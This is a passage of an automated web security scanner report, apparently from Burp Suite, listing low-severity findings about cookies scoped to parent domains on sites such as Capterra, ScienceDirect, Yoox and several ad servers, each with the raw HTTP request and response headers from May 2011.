Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
X-AspNet-Version: 4.0.30319
x-machine-name: Rainbow-28 (i-00667d77)
X-Powered-By: ASP.NET
Content-Length: 3147
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>

<script type="text/javascr
...[SNIP]...

14.2. http://www.capterra.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 21:29:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=75f949d578551313ca6b29b53fc5e0fb; domain=.capterra.com; path=/
Status: 200 OK
ETag: "d4dd6081c7ecf86b42335bf1f4e6746d"
X-Runtime: 2ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 22685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.3. http://www.capterra.com/business-management-and-analytics-software

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /business-management-and-analytics-software

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-management-and-analytics-software HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
Referer: http://www.capterra.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; __utmz=212671878.1304389766.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212671878.1729683407.1304389766.1304389766.1304389766.1; __utmc=212671878; __utmb=212671878.1.10.1304389766

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 21:30:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; domain=.capterra.com; path=/
Status: 200 OK
ETag: "8a3d275b53eeffcb296a4cfa5aae81c1"
X-Runtime: 13ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 8441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.4. http://www.capterra.com/business-process-management-software

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /business-process-management-software

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-process-management-software HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
Referer: http://www.capterra.com/business-management-and-analytics-software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=212671878.1304389766.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; __utma=212671878.1729683407.1304389766.1304389766.1304389766.1; __utmc=212671878

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 23:57:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; domain=.capterra.com; path=/
Status: 200 OK
ETag: "3e7fe3ed26f6467dbf4a37a525a340bd"
X-Runtime: 236ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 234279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.5. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.house24.ilsole24ore.com
Path:   /external/showCase/library-luxury24~2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/showCase/library-luxury24~2.js HTTP/1.1
Host: www.house24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.luxury24.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_cc=true; s_nr=1304393553709-New; SC_LINKS_SH=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:49 GMT
Server: Apache/2.2.11 (Debian) PHP/5.2.9-3eks with Suhosin-Patch
X-Powered-By: PHP/5.2.9-3eks
Set-Cookie: H24SESSID=ed2eeb4e11d807c61f2aca7698b279f0; path=/; domain=.house24.ilsole24ore.com
Expires: Mon, 09 May 2011 22:32:49 GMT
Cache-Control: public, max-age=604800
Pragma: no-cache
Last-Modified: Tue, 12 Apr 2011 08:24:23 GMT
Etag: "96111dfa08b9f205112dfd02a54280a7"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 93812

//<![CDATA[
// Including compressedLegacy.js
(function(){var p=null;if((p||typeof djConfig!="undefined"&&djConfig.scopeMap)&&typeof window!="undefined"){var y="",I="",E="",F={},L={};p=p||djConfig.scop
...[SNIP]...

14.6. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.house24.ilsole24ore.com
Path:   /vimages/default/logos/house24extCarouselBanner.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vimages/default/logos/house24extCarouselBanner.png HTTP/1.1
Host: www.house24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.luxury24.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_cc=true; s_nr=1304393553709-New; SC_LINKS_SH=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:49 GMT
Server: Apache/2.2.11 (Debian) PHP/5.2.9-3eks with Suhosin-Patch
X-Powered-By: PHP/5.2.9-3eks
Set-Cookie: H24SESSID=0c09dfd5003f480e5b42c4baca3d49ba; path=/; domain=.house24.ilsole24ore.com
Expires: Mon, 02 May 2011 23:32:49 GMT
Cache-Control: private, max-age=3600
Pragma: no-cache
Content-Length: 1864
Last-Modified: Tue, 12 Apr 2011 08:24:23 GMT
Etag: "9befdc06f66f8b037b32248b9a063423"
Content-Type: image/png

...[SNIP]...

14.7. http://www.sciencedirect.com/science/journal/09574174

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sciencedirect.com
Path:   /science/journal/09574174

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /science/journal/09574174 HTTP/1.1
Host: www.sciencedirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:11 GMT
Last-Modified: Mon, 02 May 2011 21:30:11 GMT
Set-Cookie: EUID=5c90559a-7503-11e0-a9ef-00008a0c593e; expires=Sunday, 27 Apr 2031 21:30:11 GMT; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMISESSION=5c8fd124-7503-11e0-a9ef-00008a0c593e:3481824611; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMIAUTH=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; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMIAUTH=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; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1162923096
Server: www.sciencedirect.com 9999 138.12.6.53:80
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRAN
...[SNIP]...

14.8. https://www.sciencedirect.com/science

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.sciencedirect.com
Path:   /science

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /science?_ob=RegistrationURL&_method=display&_type=guest&_returnURL=http%3A%2F%2Fwww.sciencedirect.com%2Fscience%3F&_acct=C000050221&_version=1&_userid=10&md5=45e26359c93486a3badd56805f2eba73 HTTP/1.1
Host: www.sciencedirect.com
Connection: keep-alive
Referer: http://www.sciencedirect.com/science/journal/09574174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EUID=4d15f4a8-7503-11e0-b300-00008a0c593d; MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824585; TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; MIAMIAUTH=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; BROWSER_SUPPORTS_COOKIES=1

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:41 GMT
Last-Modified: Mon, 02 May 2011 21:30:41 GMT
Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1136083128
Server: www.sciencedirect.com 9999 138.12.6.33:443
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRA
...[SNIP]...

14.9. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.yoox.com
Path:   /scripts/services/dynamicsGalleryService.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1
Host: www.yoox.com
Proxy-Connection: keep-alive
Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=UTF-8
Expires: Tue, 09 Oct 1990 22:00:00 GMT
Server: Microsoft-IIS/7.5
CT: 5/3/2011 12:49:47 AM
X-Powered-By: ASP.NET
ORIGIN: Web18
Vary: Accept-Encoding
Date: Mon, 02 May 2011 22:45:43 GMT
Connection: close
Set-Cookie: SESSIONTRACKING=isfirst=1&session=44859fce%2D86d5%2D4c64%2Db601%2Dd31b5e7ff802; domain=yoox.com; path=/
Set-Cookie: SESSIONS=FIRSTTIMEUSER=1; domain=yoox.com; path=/
Set-Cookie: REMEMBERCOUNTRY=REMEMBER=0; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: VISIT=WAREHOUSES=271%2C974&ANONYMOUS%5FCHECKOUT=true&EUR%5FEXCHANGE%5FRATE=1%2E00000&VALUTA%5FID=2&DYN%5FPATH=%2Fit%2F&SIGLA%5FVALUTA=EUR&ID%5FMERCATO%5FPER%5FLISTINO=2&REFERENCE%5FCURRENCYCODE=EUR&CURRENCYCODE=EUR&ID%5FMERCATO=2&NAZIONE%5FISO=IT&MERCATO%5FPATH=%2Fit%2F&CAMBIO%5FEURO=1%2E00000&NAZIONE=ITALY&TSKAY=6383154F&SITE%5FCODE=YOOX%5FIT&ID%5FNAZIONE=2; domain=yoox.com; path=/
Set-Cookie: HBXSESSION=NEWUSER=1; domain=yoox.com; path=/
Set-Cookie: OLDVISIT=1; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: USERINFO=SESSOBAMBINO=D&SESSO=D; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: ABTESTINGNEWUSER=1; domain=yoox.com; path=/
Content-Length: 1779

<?xml version="1.0"?>
<gallery>
<image code="39215905" tit="JUST CAVALLI" subtit="Cardigan" macro="Maglieria" prezzo="225" prezzoold="225" />
<image code="44300112" tit="PATRICIA ROSALES" subtit="S
...[SNIP]...

14.10. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 22:21:27 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

14.11. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=absoluteastronomycom&adSpace=ros&tagKey=3617734779&th=24028783270&tKey=undefined&size=160x600|120x600&p=9723396&a=1&flashVer=10&ver=1.20&center=1&noAd=1&addBlockingCategories=Adult|Sweepstakes|Suggestive|Flashing|Warning|Audio|Pop-under|Pop-up|Full-page|Expandable&url=http%3A%2F%2Fwww.absoluteastronomy.com%2Ftopics%2FExpert_system&f=0&rnd=9723461 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.absoluteastronomy.com/topics/Expert_system
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=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

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 21:29:46 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 584

document.write('<!-- START DART (iframe) -->\n<IFRAME SRC=\'http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114;sz=120x600;click=http://a.tribalfusion.com/h.click/aSmOnI4drZdPs7Zd5
...[SNIP]...

14.12. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098;sz=728x90;click0=http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/1419684132/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626633303930?;ord=1419684132? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 22:31:04 GMT
Expires: Mon, 02 May 2011 22:31:04 GMT
Cache-Control: private
Content-Length: 5973

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

14.13. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/els.SDguest/ISSNgeneral

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/els.SDguest/ISSNgeneral;ISSN=general;pg=unknown;dcopt=ist;;tile=1;sz=728x90,1000x50;ord=5567342749? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 02 May 2011 23:54:10 GMT
Expires: Mon, 02 May 2011 23:54:10 GMT
Cache-Control: private
Content-Length: 244

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3afb/0/0/%2a/j;44306;0-0;0;58712962;3454-728/90;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0
...[SNIP]...

14.14. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /ad/tiscaliadv.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1
Host: ad78.neodatagroup.com
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml"
Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT
Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com;
Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 758
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close

var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g
...[SNIP]...

14.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:39 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 37380
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'BackGround') {
document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e
...[SNIP]...

14.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

Summary

Severity:   Information
Confidence:   Certain
